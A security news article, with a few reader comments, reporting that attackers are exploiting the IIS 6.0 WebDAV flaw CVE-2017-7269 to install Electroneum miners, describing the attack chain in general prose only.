Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.
Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers using former IIS 6.0 zero-day
Hackers are using CVE–2017–7269 to take over servers. This is a vulnerability discovered by two Chinese researchers in March 2017 that affects IIS' WebDAV service. At the time it was discovered last year, the flaw was a zero-day, being under heavy exploitation for almost nine months, since June 2016.
Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default —Windows XP and Windows Server 2003.
But the vulnerability shared some common traits with the EXPLODINGCAN NSA exploit leaked in April 2017 by the Shadow Brokers, and it eventually received a fix in mid-June 2017.
Since then, it's been used by at least one threat actor to deploy Monero miners on Windows servers still running the old IIS 6.0 version.
Hackers using CVE-2017-7269 to install Electroneum miner
Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of Monero.
According to experts, the threat actor uses CVE–2017–7269 to deliver an ASCII shellcode which contains a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.
Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.
F5 experts said the Electroneum address they found in attacks stored only $99, suggesting they either caught the campaign at its beginning, or crooks are rotating address IDs to avoid researchers from tracking their entire operation.
These are also not the first crooks to mine Electroneum instead of Monero, the cryptocurrency of choice for all recent illegal mining campaigns. The Dofoil malware campaign also used Electroneum, and so did another coinminer campaign that used the legitimate CertUtil Windows utility to download the mining malware on user's systems.
Comments
Demonslay335 - 7 months ago
Even though IIS 6.0 is deprecated, Microsoft still recommends using it as an SMTP relay for programmatic email on the local server, so many people may not realize they have it running. As long as it is restricted to localhost relaying, and no other ports/services of it are exposed though, should be fine.
thx1200 - 7 months ago
"Even though IIS 6.0 is deprecated, Microsoft still recommends using it as an SMTP relay for programmatic email on the local server, so many people may not realize they have it running. As long as it is restricted to localhost relaying, and no other ports/services of it are exposed though, should be fine."
What you are talking about it not actually IIS6. It's just a compatibility layer to expose IIS6-like APIs to applications, but under the hood it's still II7/8/9/10. The SMTP service you are talking about is a deprecated service, so there really isn't new development happening, and it requires IIS6 APIs to function.
Demonslay335 - 7 months ago
Ah, interesting to know. That makes much more sense, thanks!